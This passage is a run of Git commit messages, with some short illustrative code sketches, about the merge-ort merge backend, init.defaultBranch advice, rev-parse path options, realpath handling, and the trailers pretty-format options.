definitely more so than using num_create for the latter.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Eventually we want to omit the advice when we can fast-forward,
in which case there is no reason to require the user to choose
between rebase and merge.
In order to do so, we need to delay giving the advice up to the
point where we can check if we can fast-forward or not.
Additionally, config_get_rebase() was probably never its true home.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We would like to be able to make this check before the decision to
rebase is made in a future step. Besides, using a separate helper
makes the code easier to follow.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add code which determines which kind of special rename case each rename
corresponds to, but leave the handling of each type unimplemented for
now. Future commits will implement each one.
There is some tenuous resemblance to merge-recursive's
process_renames(), but comparing the two is very unlikely to yield any
insights. merge-ort's process_renames() is a bit complex and I would
prefer if I could simplify it more, but it is far easier to grok than
merge-recursive's function of the same name in my opinion. Plus,
merge-ort handles more rename conflict types than merge-recursive does.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Based heavily on merge-recursive's get_diffpairs() function, and also
includes the necessary paired call to diff_warn_rename_limit() so that
users will be warned if merge.renameLimit is not sufficiently large for
rename detection to run.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will grow later, but we only need a few fields for basic rename
handling.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the documentation of the file system monitor extension to
describe version 2.
The format was extended to support opaque tokens in:
56c6910028 fsmonitor: change last update timestamp on the index_state to opaque token
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was implemented in the 'git multi-pack-index' command and
merged in 468b3221 (Merge branch 'ds/multi-pack-verify',
2018-10-10).
And there's no 'git midx' command.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To give ample warning for users wishing to override Git's fall-back
for an unconfigured `init.defaultBranch` (in case we decide to change it
in a future Git version), let's introduce some advice that is shown upon
`git init` when that value is not set.
Note: two test cases in Git's test suite want to verify that the
`stderr` output of `git init` is empty. It is now necessary to suppress
the advice; we do that via the `init.defaultBranch` setting. While
not strictly necessary, we also set this to `false` in
`test_create_repo()`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to introduce a message giving users running `git init` some
advice about `init.defaultBranch`. This will necessarily be done in
`repo_default_branch_name()`.
Not all code paths want to show that advice, though. In particular, the
`git clone` codepath _specifically_ asks for `init_db()` to be quiet,
via the `INIT_DB_QUIET` flag.
In preparation for showing users above-mentioned advice, let's change
the function signature of `get_default_branch_name()` to accept the
parameter `quiet`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In one of the next commits, we would like to give users some advice
regarding the initial branch name, and how to modify it.
To that end, it would be good if `git branch -m <name>` worked in a
freshly initialized repository without any commits. Let's make it so.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our documentation does not mention any future plan to change 'master' to
another value. It is a good idea to document this, though.
Initial-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The focus here is on adding a path_msg() which will queue up
warning/conflict/notice messages about the merge for later processing,
storing these in a pathname -> strbuf map. It might seem like a big
change, but it really just is:
* declaration of necessary map with some comments
* initialization and recording of data
* a bunch of code to iterate over the map at print/free time
* at least one caller in order to avoid an error about having an
unused function (which we provide in the form of implementing
modify/delete conflict handling).
At this stage, it is probably not clear why I am opting for delayed
output processing. There are multiple reasons:
1. Merges are supposed to abort if they would overwrite dirty changes
in the working tree. We cannot correctly determine whether changes
would be overwritten until both rename detection has occurred and
full processing of entries with the renames has finalized.
Warning/conflict/notice messages come up at intermediate codepaths
along the way, so unless we want spurious conflict/warning messages
being printed when the merge will be aborted anyway, we need to
save these messages and only print them when relevant.
2. There can be multiple messages for a single path, and we want all
messages for a given path to appear together instead of having them
grouped by conflict/warning type. This was a problem already with
merge-recursive.c but became even more important due to the
splitting apart of conflict types as discussed in the commit
message for 1f3c9ba707 ("t6425: be more flexible with rename/delete
conflict messages", 2020-08-10).
3. Some callers might want to avoid showing the output in certain
cases, such as if the end result is a clean merge. Rebases have
typically done this.
4. Some callers might not want the output to go to stdout or even
stderr, but might want to do something else with it entirely.
For example, a --remerge-diff option to `git show` or `git log
-p` that remerges on the fly and diffs merge commits against the
remerged version would benefit from stdout/stderr not being
written to in the standard form.
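The delayed-output idea can be sketched with a tiny fixed-size map from
path to an accumulated message buffer. Everything here (names, sizes,
the linear lookup) is a hypothetical simplification, not the strmap and
strbuf based code itself:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define SKETCH_MAX_PATHS 8
#define SKETCH_BUF_SIZE 256

/* Hypothetical path -> message buffer map with fixed capacity. */
struct sketch_msgs {
	const char *path[SKETCH_MAX_PATHS];
	char buf[SKETCH_MAX_PATHS][SKETCH_BUF_SIZE];
	size_t nr;
};

/* Queue a message for a path instead of printing it right away. */
static void sketch_path_msg(struct sketch_msgs *m, const char *path,
			    const char *msg)
{
	size_t i, used;

	for (i = 0; i < m->nr; i++)
		if (!strcmp(m->path[i], path))
			break;
	if (i == m->nr) {
		assert(m->nr < SKETCH_MAX_PATHS);
		m->path[i] = path;
		m->buf[i][0] = '\0';
		m->nr++;
	}
	used = strlen(m->buf[i]);
	/* Text beyond the buffer size is silently truncated in this sketch. */
	snprintf(m->buf[i] + used, SKETCH_BUF_SIZE - used, "%s\n", msg);
}

/* All queued messages for one path, in the order they were added. */
static const char *sketch_msgs_for(const struct sketch_msgs *m,
				   const char *path)
{
	size_t i;

	for (i = 0; i < m->nr; i++)
		if (!strcmp(m->path[i], path))
			return m->buf[i];
	return "";
}
```

Because messages are grouped by path at queue time, a caller can later
print them together, redirect them, or drop them entirely if the merge
is aborted or turns out clean.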
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This simplistic and weird-looking patch is here to facilitate future
patch submissions. Adding this stub allows rename detection code to
reference it in one patch series, while a separate patch series can
define the implementation, and then both series can merge cleanly and
work nicely together at that point.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit b658536f59 ("merge-ort: add some high-level algorithm structure",
2020-10-27) added high-level structure of the ort merge algorithm. As
we have added more and more functions, that high-level structure has
been slightly obscured. Since functions are still grouped according to
this high-level structure, add comments denoting sections where all the
functions are specifically tied to a piece of the high-level structure.
These function groupings include a few sub-divisions of the original
high-level structure, including some sub-divisions that are yet to be
submitted. Each has (or will have) several functions all serving as
helpers to one or two main functions for each section.
As an added bonus, the comments will serve to provide a small textual
separation between nearby sections and allow the next three patch series
to be submitted independently and merge cleanly.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This field will be used in future patches to allow removal of paths from
opt->priv->paths.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This field is not yet used, but will be used by both the rename handling
code, and the conflict type handling code in process_entry().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move most of merge_finalize() into a new helper function,
clear_internal_opts(). This is a step to facilitate recursive merges,
as well as some future optimizations.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Include blob.h for definition of blob_type, and commit-reach.h for
declarations of get_merge_bases() and in_merge_bases(). While none of
these are used yet, we want to avoid cross-dependencies in the next
three series of patches for merge-ort and merge them at the end; adding
these "#include"s now avoids textual conflicts.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After checkout(), the working tree has the appropriate contents, and the
index matches the working copy. That means that all unmodified and
cleanly merged files have correct index entries, but conflicted entries
need to be updated.
We do this by looping over the conflicted entries, marking the existing
index entry for the path with CE_REMOVE, adding new higher order stages
for the path at the end of the index (ignoring normal index sort order),
and then at the end of the loop removing the CE_REMOVE-marked cache
entries and sorting the index.
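The mark, append, compact, and sort sequence can be sketched on a toy
array. The struct, the flag value, and the assumption that every
conflicted path gets exactly stages 1 through 3 are hypothetical
simplifications for illustration:

```c
#include <stdlib.h>
#include <string.h>

#define SKETCH_REMOVE 1 /* hypothetical stand-in for the CE_REMOVE flag */

struct sketch_ce {
	const char *path;
	int stage;
	int flags;
};

static int sketch_ce_cmp(const void *a, const void *b)
{
	const struct sketch_ce *x = a, *y = b;
	int c = strcmp(x->path, y->path);

	return c ? c : x->stage - y->stage;
}

/*
 * Record one conflicted path. "ce" must have room for nr + 3 entries.
 * Returns the new number of entries.
 */
static size_t sketch_record_conflict(struct sketch_ce *ce, size_t nr,
				     const char *path)
{
	size_t i, orig_nr = nr, kept = 0;
	int stage;

	/* Mark the existing stage-0 entry for removal. */
	for (i = 0; i < orig_nr; i++)
		if (!strcmp(ce[i].path, path))
			ce[i].flags |= SKETCH_REMOVE;

	/* Append higher-order stages at the end, ignoring sort order. */
	for (stage = 1; stage <= 3; stage++) {
		ce[nr].path = path;
		ce[nr].stage = stage;
		ce[nr].flags = 0;
		nr++;
	}

	/* Drop the marked entries, then restore the sort order. */
	for (i = 0; i < nr; i++)
		if (!(ce[i].flags & SKETCH_REMOVE))
			ce[kept++] = ce[i];
	qsort(ce, kept, sizeof(*ce), sketch_ce_cmp);
	return kept;
}
```

This sketch compacts and sorts after every path to stay short; the text
above describes doing both once, after the loop over all conflicted
entries.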
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since merge-ort creates a tree for its output, when there are no
conflicts, updating the working tree and index is as simple as using the
unpack_trees() machinery with a twoway_merge (i.e. doing the equivalent
of a "checkout" operation).
If there were conflicts in the merge, then since the tree we created
included all the conflict markers, using the unpack_trees machinery
in this manner will still update the working tree correctly. Further,
all index entries corresponding to cleanly merged files will also be
updated correctly by this procedure. Index entries corresponding to
conflicted entries will appear as though the user had run "git add -u"
after the merge to accept all files as-is with conflict markers.
Thus, after running unpack_trees(), there needs to be a separate step
for updating the entries in the index corresponding to conflicted files.
This will be the job for the function record_conflicted_index_entries(),
which will be implemented in a subsequent commit.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds a basic implementation for merge_switch_to_result(), though
just in terms of a few new empty functions that will be defined in
subsequent commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our order for processing of entries means that if we have a tree of
files that looks like
    Makefile
    src/moduleA/foo.c
    src/moduleA/bar.c
    src/moduleB/baz.c
    src/moduleB/umm.c
    tokens.txt
Then we will process paths in the order of the leftmost column below. I
have added two additional columns that help explain the algorithm that
follows; the 2nd column is there to remind us we have oid & mode info we
are tracking for each of these paths (which differs between the paths
which I'm not representing well here), and the third column annotates
the parent directory of the entry:
    tokens.txt         <version_info>      ""
    src/moduleB/umm.c  <version_info>      src/moduleB
    src/moduleB/baz.c  <version_info>      src/moduleB
    src/moduleB        <version_info>      src
    src/moduleA/foo.c  <version_info>      src/moduleA
    src/moduleA/bar.c  <version_info>      src/moduleA
    src/moduleA        <version_info>      src
    src                <version_info>      ""
    Makefile           <version_info>      ""
When the parent directory changes, if it's a subdirectory of the previous
parent directory (e.g. "" -> src/moduleB) then we can just keep appending.
If the parent directory differs from the previous parent directory and is
not a subdirectory, then we should process that directory.
So, for example, when we get to this point:
    tokens.txt         <version_info>      ""
    src/moduleB/umm.c  <version_info>      src/moduleB
    src/moduleB/baz.c  <version_info>      src/moduleB
and note that the next entry (src/moduleB) has a different parent than
the last one that isn't a subdirectory, we should write out a tree for it
    100644 blob <HASH> umm.c
    100644 blob <HASH> baz.c
then pop all the entries under that directory while recording the new
hash for that directory, leaving us with
    tokens.txt         <version_info>      ""
    src/moduleB        <new version_info>  src
This process repeats until at the end we get to
    tokens.txt         <version_info>      ""
    src                <new version_info>  ""
    Makefile           <version_info>      ""
and then we can write out the toplevel tree. Since we potentially have
entries in our string_list corresponding to multiple different toplevel
directories, e.g. a slightly different repository might have:
whizbang.txt <version_info> ""
tokens.txt <version_info> ""
src/moduleD <new version_info> src
src/moduleC <new version_info> src
src/moduleB <new version_info> src
src/moduleA/foo.c <version_info> src/moduleA
src/moduleA/bar.c <version_info> src/moduleA
When src/moduleA is popped off, we need to know that the "last
directory" reverts back to src, and how many entries in our string_list
are associated with that parent directory. So I use an auxiliary
offsets string_list which would have (parent_directory,offset)
information of the form
"" 0
src 2
src/moduleA 5
Whenever I write out a tree for a subdirectory, I set versions.nr to
the final offset value and then decrement offsets.nr...and then add
an entry to versions with a hash for the new directory.
The idea is relatively simple, there's just a lot of accounting to
implement this.
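
The accounting described above can be sketched roughly as follows. This is only an illustration in Python, not the merge-ort code: fake_tree_id() and write_trees() are hypothetical names, the hash is a SHA-1 over a made-up text encoding rather than Git's tree object format, and directory entries are assumed to arrive with oid=None in the processing order shown earlier.

```python
import hashlib


def fake_tree_id(entries):
    """Hash (mode, name, oid) entries sorted by name. NOT Git's tree format."""
    digest = hashlib.sha1()
    for mode, name, oid in sorted(entries, key=lambda entry: entry[1]):
        digest.update(f"{mode} {name} {oid}\n".encode())
    return digest.hexdigest()


def write_trees(entries):
    """Build trees bottom-up from (path, mode, oid) tuples in processing order.

    Directory entries carry oid=None; their ids are computed here.
    Returns (toplevel_tree_id, {directory: tree_id}).
    """
    versions = []    # (mode, basename, oid) of entries not yet in a tree
    offsets = []     # stack of (directory, index where it starts in versions)
    trees = {}
    last_dir = None

    def complete(directory):
        # Write a tree from everything recorded for `directory`, then pop it.
        name, start = offsets.pop()
        assert name == directory
        trees[directory] = fake_tree_id(versions[start:])
        del versions[start:]

    for path, mode, oid in entries:
        new_dir, _, basename = path.rpartition("/")
        if new_dir != last_dir:
            is_subdir = (last_dir in (None, "")
                         or new_dir.startswith(last_dir + "/"))
            if not is_subdir:
                complete(last_dir)
            if not offsets or offsets[-1][0] != new_dir:
                offsets.append((new_dir, len(versions)))
            last_dir = new_dir
        if oid is None:
            oid = trees[path]    # the directory's tree was just written
        versions.append((mode, basename, oid))

    if not offsets:              # no entries at all: empty toplevel tree
        offsets.append(("", 0))
    complete("")
    return trees[""], trees
```

Feeding it the nine entries from the example (tokens.txt first, Makefile last) yields trees for src/moduleB, src/moduleA, src and the toplevel, in that order. The sketch does not handle directories without children.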
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a new function, write_tree(), which will take a list of
basenames, modes, and oids for a single directory and create a tree
object in the object-store. We do not yet have just basenames, modes,
and oids for just a single directory (we have a mixture of entries from
all directory levels in the hierarchy) so we still die() before the
current call to write_tree(), but the next patch will rectify that.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a step towards transforming the processed path->conflict_info entries
into an actual tree object, start recording basenames, modes, and oids
in a dir_metadata structure. Subsequent commits will make use of this
to actually write a tree.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to handle paths below a directory before needing to handle the
directory itself. Also, we want to handle the directory immediately
after the paths below it, so we can't use simple lexicographic ordering
from strcmp (which would insert foo.txt between foo and foo/file.c).
Copy string_list_df_name_compare() from merge-recursive.c, and set up a
string list of paths sorted by that function so that we can iterate in
the desired order.
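
To illustrate the ordering problem, here is a small Python sketch. It is not the C comparison function; it only approximates the effect by comparing every path as if it had a trailing slash, and df_order() is a hypothetical name.

```python
def df_order(paths):
    """Sort paths as if each one ended in '/', so a directory sorts
    directly before the entries below it."""
    return sorted(paths, key=lambda path: path + "/")


paths = ["foo", "foo.txt", "foo/file.c"]

# Plain lexicographic order puts foo.txt between foo and foo/file.c.
plain_order = sorted(paths)

# Iterating the df-ordered list in reverse handles foo/file.c first and
# then foo immediately afterwards.
processing_order = list(reversed(df_order(paths)))
```

With this key, '.' sorts before '/', so foo.txt no longer lands between the directory and its contents.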
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a process_entries() implementation that just loops over the paths
and processes each one individually with an auxiliary process_entry()
call. Add a basic process_entry() as well, which handles several cases
but leaves a few of the more involved ones with die-not-implemented
messages. Also, although process_entries() is supposed to create a
tree, it does not yet have code to do so -- except in the special case
of merging completely empty trees.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When all three trees have the same oid, there is no need to recurse into
these trees to find that all files within them happen to match. We can
just record any one of the trees as the resolution of merging that
particular path.
Immediately resolving trees for other types of trivial tree merges (such
as one side matches the merge base, or the two sides match each other)
would prevent us from detecting renames for some paths, and thus prevent
us from doing three-way content merges for those paths whose renames we
did not detect.
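
The rule can be summarized in a few lines of Python. This is a sketch of the decision only, with a hypothetical function name; the oids are treated as opaque strings.

```python
def trivial_tree_resolution(base_oid, side1_oid, side2_oid):
    """Return the oid to record for this tree, or None if we must recurse."""
    if base_oid == side1_oid == side2_oid:
        # All three trees are identical, so any one of them is the result.
        return base_oid
    # One side matching the base, or both sides matching each other, is
    # deliberately not resolved here so that renames can still be detected.
    return None
```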
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a helper function, setup_path_info(), which can be used to record
all the information we want in a merged_info or conflict_info. While
there is currently only one caller of this new function, and some of its
particular parameters are fixed, future callers of this function will be
added later.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Three-way merges, by their nature, are going to often have two or more
trees match at a given subdirectory. We can avoid calling
fill_tree_descriptor() on the same tree by checking when these trees
match. Noting when various oids match will also be useful in other
calculations and optimizations as well.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This does not actually collect any necessary info other than the
pathnames involved, since it just allocates an all-zero conflict_info
and stuffs that into paths. However, it invokes the traverse_trees()
machinery to walk over all the paths and sets up the basic
infrastructure we need.
I have left out a few obvious optimizations to try to make this patch as
short and obvious as possible. A subsequent patch will add some of
those back in with some more useful data fields before we introduce a
patch that actually sets up the conflict_info fields.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Various places in merge-recursive used an err() function when it hit
some kind of unrecoverable error. That code was from the reusable bits
of merge-recursive.c that we liked, such as merge_3way, writing object
files to the object store, reading blobs from the object store, etc. So
create a similar function to allow us to port that code over, and use it
for when we detect problems returned from collect_merge_info()'s
traverse_trees() call, which we will be adding next.
While we are at it, also add more documentation for the "clean" field
from struct merge_result, particularly since the name suggests a boolean
but it is not quite one and this is our first non-boolean usage.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In my cursory investigation, histogram diffs are about 2% slower than
Myers diffs. Others have probably done more detailed benchmarks. But,
in short, histogram diffs have been around for years and in a number of
cases provide obviously better looking diffs where Myers diffs are
unintelligible but the performance hit has kept them from becoming the
default.
However, there are real merge bugs we know about that have triggered on
git.git and linux.git, which I don't have a clue how to address without
the additional information that I believe is provided by histogram
diffs. See the following:
https://lore.kernel.org/git/20190816184051.GB13894@sigill.intra.peff.net/
https://lore.kernel.org/git/CABPp-BHvJHpSJT7sdFwfNcPn_sOXwJi3=o14qjZS3M8Rzcxe2A@mail.gmail.com/
https://lore.kernel.org/git/CABPp-BGtez4qjbtFT1hQoREfcJPmk9MzjhY5eEq1QhXT23tFOw@mail.gmail.com/
I don't like mismerges. I really don't like silent mismerges. While I
am sometimes willing to make performance and correctness tradeoffs, I'm
much more interested in correctness in general. I want to fix the above
bugs. I have not yet started doing so, but I believe histogram diff at
least gives me an angle. Unfortunately, I can't rely on using the
information from histogram diff unless it's in use. And it hasn't been
used because of a performance hit of a few percent.
In testcases I have looked at, merge-ort is _much_ faster than
merge-recursive for non-trivial merges/rebases/cherry-picks. As such,
this is a golden opportunity to switch out the underlying diff algorithm
(at least the one used by the merge machinery; git-diff and git-log are
separate questions); doing so will allow me to get additional data and
improved diffs, and I believe it will help me fix the above bugs at some
point in the future.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge_start() basically does a bunch of sanity checks, then allocates
and initializes opt->priv -- a struct merge_options_internal.
Most of the sanity checks are usable as-is. The
allocation/initialization is a bit different since merge-ort has a very
different merge_options_internal than merge-recursive, but the idea is
the same.
The weirdest part here is that merge-ort and merge-recursive use the
same struct merge_options, even though merge_options has a number of
fields that are oddly specific to merge-recursive's internal
implementation and don't even make sense with merge-ort's high-level
design (e.g. buffer_output, which merge-ort has to always do). I reused
the same data structure because:
* most of the fields made sense to both merge algorithms
* making a new struct would have required making new enums or somehow
externalizing them, and that was getting messy.
* it simplifies converting the existing callers by not having to
have different code paths for merge_options setup.
I also marked detect_renames as ignored. We can revisit that later, but
in short: merge-recursive allowed turning off rename detection because
it was sometimes glacially slow. When you speed something up by a few
orders of magnitude, it's worth revisiting whether that justification is
still relevant. Besides, if folks find it's still too slow, perhaps
they have a better scaling case than I could find and maybe it turns up
some more optimizations we can add. If it still is needed as an option,
it is easy to add later.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge_ort_nonrecursive_internal() will be used by both
merge_inmemory_nonrecursive() and merge_inmemory_recursive(); let's
focus on it for now. It involves some setup -- merge_start() --
followed by the following chain of functions:
collect_merge_info()
This function will populate merge_options_internal's paths field,
via a call to traverse_trees() and a new callback that will be added
later.
detect_and_process_renames()
This function will detect renames, and then adjust entries in paths
to move conflict stages from old pathnames into those for new
pathnames, so that the next step doesn't have to think about renames
and just can do three-way content merging and such.
process_entries()
This function determines how to take the various stages (versions of
a file from the three different sides) and merge them, and whether
to mark the result as conflicted or cleanly merged. It also writes
out these merged file versions as it goes to create a tree.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Set up some basic internal data structures. The only carry-over from
merge-recursive.c is call_depth, though needed_rename_limit will be
added later.
The central piece of data will definitely be the strmap "paths", which
will map every relevant pathname under consideration to either a
merged_info or a conflict_info. ("conflicted" is a strmap that is a
subset of "paths".)
merged_info contains all relevant information for a non-conflicted
entry. conflict_info contains a merged_info, plus any additional
information about a conflict such as the higher order stages involved
and the names of the paths those came from (handy once renames get
involved). If an entry remains conflicted, the merged_info portion of a
conflict_info will later be filled with whatever version of the file
should be placed in the working directory (e.g. an as-merged-as-possible
variation that contains conflict markers).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git rev-parse has several options which print various paths. Some of
these paths are printed relative to the current working directory, and
some are absolute.
Normally, this is not a problem, but there are times when one wants
paths entirely in one format or another. This can be done trivially if
the paths are canonical, but canonicalizing paths is not possible on
some shell scripting environments which lack realpath(1) and also in Go,
which lacks functions that properly canonicalize paths on Windows.
To help out the scripter, let's provide an option which turns most of
the paths printed by git rev-parse to be either relative to the current
working directory or absolute and canonical. Document which options are
affected and which are not so that users are not confused.
This approach is cleaner and tidier than providing duplicates of
existing options which are either relative or absolute.
Note that if the user needs both forms, it is possible to pass an
additional option in the middle of the command line which changes the
behavior of subsequent operations.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, we have a function to resolve paths, strbuf_realpath. This
function canonicalizes paths like realpath(3), but permits a trailing
component to be absent from the file system. In other words, this is
the behavior of the GNU realpath(1) without any arguments.
In the future, we'll need this same behavior, except that we want to
allow for any number of missing trailing components, which is the
behavior of GNU realpath(1) with the -m option. This is useful because
we'll want to canonicalize a path that may point to a not yet present
path under the .git directory. For example, a user may want to know
where an arbitrary ref would be stored if it existed in the file system.
Let's refactor strbuf_realpath to move most of the code to an internal
function and then pass it two flags to control its behavior. We'll add
a strbuf_realpath_forgiving function that has our new behavior, and
leave strbuf_realpath with the older, stricter behavior.
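
The difference between the two behaviors can be shown with a Python sketch built on pathlib. This is not the C implementation; realpath_strict() and realpath_forgiving() are hypothetical names, and the strict variant only approximates "one missing trailing component" (a dangling symlink, for example, is not treated specially).

```python
from pathlib import Path


def realpath_strict(path):
    """Canonicalize path; only the final component may be missing."""
    path = Path(path)
    try:
        return path.resolve(strict=True)
    except FileNotFoundError:
        # Everything up to the last component must still exist.
        return path.parent.resolve(strict=True) / path.name


def realpath_forgiving(path):
    """Canonicalize path; any number of trailing components may be missing."""
    return Path(path).resolve(strict=False)
```

For a path such as <dir>/a/b where neither a nor b exists, the strict variant raises FileNotFoundError while the forgiving one still returns a canonical path.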
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use --fixed-value in git-config calls in the git-maintenance tests, so
that the tests will continue to work even if the repo path contains
regexp metacharacters.
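
The failure mode is easy to reproduce outside of Git. The Python sketch below uses the re module, whose syntax differs from the POSIX regular expressions used by git-config, but '+' means "one or more" in both. The path and function names are made up for illustration.

```python
import re


def matches_as_regex(pattern, value):
    """Treat pattern as a regular expression, as a value pattern would be."""
    return re.search(pattern, value) is not None


def matches_fixed(pattern, value):
    """Treat pattern as a literal string, which is what --fixed-value asks for."""
    return pattern == value


repo_path = "/home/me/repo+fork"   # hypothetical path containing '+'
```

Here matches_as_regex(repo_path, repo_path) is false, because "o+" consumes one or more "o" characters and the literal "+" in the value is never matched, while matches_fixed(repo_path, repo_path) is true.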
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a "key_value_separator" option to the "%(trailers)" pretty format,
to go along with the existing "separator" argument. In combination
these two options make it trivial to produce machine-readable (e.g. \0
and \0\0-delimited) format output.
As elaborated on in a previous commit which added "keyonly", it was
needlessly tedious to extract structured data from "%(trailers)"
before the addition of this "key_value_separator" option. As seen by
the test being added here, extracting this data now becomes trivial.
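
As an illustration of how a consumer might read such output, here is a Python sketch. It assumes a format along the lines of '%(trailers:separator=%x00%x00,key_value_separator=%x00)', so that trailers are separated by two NUL bytes and each key is separated from its value by one. It also assumes no value is empty, since an empty value would make the delimiters ambiguous. parse_trailers() is a hypothetical helper.

```python
def parse_trailers(field):
    """Split one NUL-delimited %(trailers) field into (key, value) pairs."""
    if not field:
        return []
    pairs = []
    for item in field.split("\0\0"):
        # The first single NUL separates the key from its value.
        key, _, value = item.partition("\0")
        pairs.append((key, value))
    return pairs
```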
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support for a "keyonly" option. This allows for easier parsing out
of the key and value. Before, if you didn't want to make assumptions
about how the key was formatted, you'd need to parse it out as e.g.:
--pretty=format:'%H%x00%(trailers:separator=%x00%x00)' \
'%x00%(trailers:separator=%x00%x00,valueonly)'
And then proceed to deduce keys by looking at those two and
subtracting the value plus the hardcoded ": " separator from the
non-valueonly %(trailers) line. Now it's possible to simply do:
--pretty=format:'%H%x00%(trailers:separator=%x00%x00,keyonly)' \
'%x00%(trailers:separator=%x00%x00,valueonly)'
Which at least reduces it to a state machine where you get N keys and
correlate them with N values. Even better would be to have a way to
change the ": " delimiter to something easily machine-readable (a key
might contain ": " too). A follow-up change will add support for that.
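
The "N keys and N values" correlation could look like the following Python sketch. It assumes the two fields were produced with separator=%x00%x00 as in the format strings above and have already been split out of the log output; correlate() is a hypothetical helper.

```python
def correlate(keys_field, values_field):
    """Pair up the keyonly and valueonly fields of one commit."""
    keys = keys_field.split("\0\0") if keys_field else []
    values = values_field.split("\0\0") if values_field else []
    if len(keys) != len(values):
        raise ValueError("expected as many keys as values")
    return list(zip(keys, values))
```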
I don't really have a use-case for just "keyonly" myself. I suppose it
would be useful in some cases as "key=*" matches case-insensitively,
so a plain "keyonly" will give you the variants of the keys you
matched. I'm mainly adding it to fix the inconsistency with
"valueonly".
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix %(trailers:valueonly) being a noop due to an overly eager
optimization in format_trailer_info() which skips custom formatting if
no custom options are given.
When "valueonly" was added in d9b936db52 (pretty: add support for
"valueonly" option in %(trailers), 2019-01-28) we forgot to add it to
the list of options that optimization checks for. See e.g. the
addition of "key" in 250bea0c16 (pretty: allow showing specific
trailers, 2019-01-28) for a similar change where this wasn't missed.
Thus the "valueonly" option in "%(trailers:valueonly)" was a noop and
the output was equivalent to that of a plain "%(trailers)". This
wasn't caught because the tests for it always combined it with other
options.
Fix the bug by adding !opts->value_only to the list. I initially
attempted to make this more future-proof by setting a flag if we got
to ":" in "%(trailers:" in format_commit_one() in pretty.c. However,
"%(trailers:" is also parsed in trailers_atom_parser() in
ref-filter.c.
There is an outstanding patch[1] to unify those two, and such a fix, or
other future-proofing, such as changing "process_trailer_options"
flags into a bitfield, would conflict with that effort. Let's instead
do the bare minimum here as this aspect of trailers is being actively
worked on by another series.
Let's also test for a plain "valueonly" without any other options, as
